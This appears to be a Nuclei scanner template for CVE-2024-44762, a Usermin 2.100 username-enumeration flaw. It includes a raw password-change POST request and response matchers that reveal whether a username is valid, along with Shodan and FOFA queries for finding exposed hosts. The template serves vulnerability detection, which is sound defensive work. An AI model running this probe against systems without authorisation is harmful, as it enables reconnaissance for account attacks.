Vulnerability Description
Usermin version 2.100 and below is susceptible to username enumeration via the password change functionality. An attacker can determine valid usernames by analyzing the response messages from the password change endpoint.
id: CVE-2024-44762

info:
  name: Usermin 2.100 - Username Enumeration
  author: ritikchaddha
  severity: medium
  description: |
    Usermin version 2.100 and below is susceptible to username enumeration via the password change functionality. An attacker can determine valid usernames by analyzing the response messages from the password change endpoint.
  remediation: |
    Upgrade to the latest version of Usermin that addresses this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/52254
    - https://www.webmin.com/usermin.html
    - https://senscybersecurity.nl/cve-2024-44762-explained/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-44762
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-44762
    cwe-id: CWE-209
    epss-score: 0.24733
    epss-percentile: 0.95952
  metadata:
    verified: true
    max-request: 1
    vendor: webmin
    product: usermin
    shodan-query: title:"Usermin"
    fofa-query: app="Usermin"
  tags: cve,cve2024,usermin,webmin,exposure,usernames

http:
  - raw:
      - |
        POST /password_change.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}/password_change.cgi

        user=admin&pam=&expired=2&old=fakePassword&new1=password&new2=password

    matchers:
      - type: word
        part: body
        words:
          - "Failed to change password: The current password is incorrect"
          - "Your login name was not found in the password file"
        condition: or
# digest: 490a0046304402202ff6517fb7f65d0868efaa2fbb137fac63cb87ae19fda39c1b8ecde7bb112a8f02201bfe36c520fd3796a08ae4df014a212730193ba36ef70fda9870cbf3407120fa:922c64590222798bb761d5b6d8e72950